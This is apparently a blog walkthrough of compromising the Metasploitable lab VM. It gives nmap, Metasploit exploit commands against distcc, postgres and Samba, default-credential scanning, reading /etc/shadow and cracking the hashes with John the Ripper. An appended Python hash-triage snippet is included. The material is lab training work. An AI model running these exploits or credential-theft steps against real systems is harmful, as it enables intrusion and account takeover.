Pwning Metasploitable – Walkthrough

Metasploitable is a vulnerable-by-design Linux VM provided by Rapid7 for practicing with the Metasploit framework. You can download it from VulnHub. I used a Kali box and VMware Player for this exercise and made sure that both VMs were set to host-only networking.

Now the purpose of Metasploitable is to find a way to root the box, and there are a number of ways to do that, depending on your approach. It took me 3 exploits to r00t the box, and I'm going to go through all of them in the following sections.

Fire up nmap to see what we have here.

nmap -p- -sT -A -sV -O -T4 -oN /root/Desktop/nmap_metasploitable.txt 192.168.68.144

Well, you can see there is a lot you can go after here, but I'm going with the easiest just because I'm lazy.

I'll go after distccd v1 even though I don't really know what it does. So I fired up Metasploit, searched for distccd, and was able to get a shell with daemon privileges.

use exploit/unix/misc/distcc_exec
set RHOST 192.168.68.144
exploit

However, we're shooting for r00t.

Next, I looked for postgres exploits and found one with an excellent rating, but you'd have to have a username and password. So I fired up the Metasploit postgres login scanner, got a hit on postgres:postgres, and then used it to exploit.

use auxiliary/scanner/postgres/postgres_login
set RHOST 192.168.68.144
exploit
use exploit/linux/postgres/postgres_payload
set RHOST 192.168.68.144
set PASSWORD postgres
exploit

Again no rØØt shell. On to the next one.

I looked for all Samba exploits with the excellent and Linux filters, which led me to usermap_script, and BOOM! I got a r00t shell.

use exploit/multi/samba/usermap_script
set RHOST 192.168.68.144
exploit
cat /etc/shadow
cat /etc/passwd

Finally, I decided to copy the shadow and passwd files and give them a try; below is the list of usernames and passwords that John the Ripper cracked.

unshadow /root/Desktop/passwd.txt /root/Desktop/shadow.txt > /root/Desktop/meta_pw_dump.txt
john /root/Desktop/meta_pw_dump.txt
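As an added example (not part of the original post): before handing a merged file to john, you can triage it with a few lines of Python, because the crypt(3) prefix of each hash field already tells you which accounts use a legacy algorithm or have no password at all. The sample input is constructed in unshadow's output format with placeholder hashes, and the function names are my own.

```python
import re

# Constructed sample in the format unshadow produces: passwd lines with the
# shadow hash spliced into field 2. Salts and hash bodies are placeholders.
SAMPLE_UNSHADOW = """\
root:$1$saltsalt$PLACEHOLDERHASHBODY:0:0:root:/root:/bin/bash
dbuser:$6$saltsalt$PLACEHOLDERHASHBODY:1000:1000:DB user:/home/dbuser:/bin/bash
sys:*:3:3:sys:/dev:/bin/sh
backup:!:34:34:backup:/var/backups:/bin/sh
guest::1001:1001:guest:/home/guest:/bin/sh
legacy:AbCdEfGhIjKlM:1002:1002:legacy:/home/legacy:/bin/sh
"""

# crypt(3) prefixes that are acceptable today; everything else is flagged.
STRONG_PREFIXES = {
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
}

def classify_hash(field):
    """Return (algorithm name, needs_attention) for one shadow hash field."""
    if field == "":
        return "empty", True          # no password set at all
    if field[0] in "*!":
        return "locked", False        # password login disabled for this account
    for prefix, name in STRONG_PREFIXES.items():
        if field.startswith(prefix):
            return name, False
    if field.startswith("$1$"):
        return "md5crypt", True       # fast legacy hash, cheap to crack
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "descrypt", True       # traditional DES crypt, 8-char limit
    return "unknown", True

def audit_unshadow(text):
    """Parse unshadow output and list accounts whose hashes need attention."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue                  # not a passwd-format record
        user, hash_field, uid = fields[0], fields[1], int(fields[2])
        algo, flagged = classify_hash(hash_field)
        if flagged:
            findings.append({"user": user, "uid": uid, "algo": algo})
    return findings

if __name__ == "__main__":
    for f in audit_unshadow(SAMPLE_UNSHADOW):
        print(f"{f['user']:<10} uid={f['uid']:<5} {f['algo']}")
```

On the sample above it reports root (md5crypt), guest (empty) and legacy (descrypt); the sha512crypt and locked accounts are left alone.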

Happy hunting!
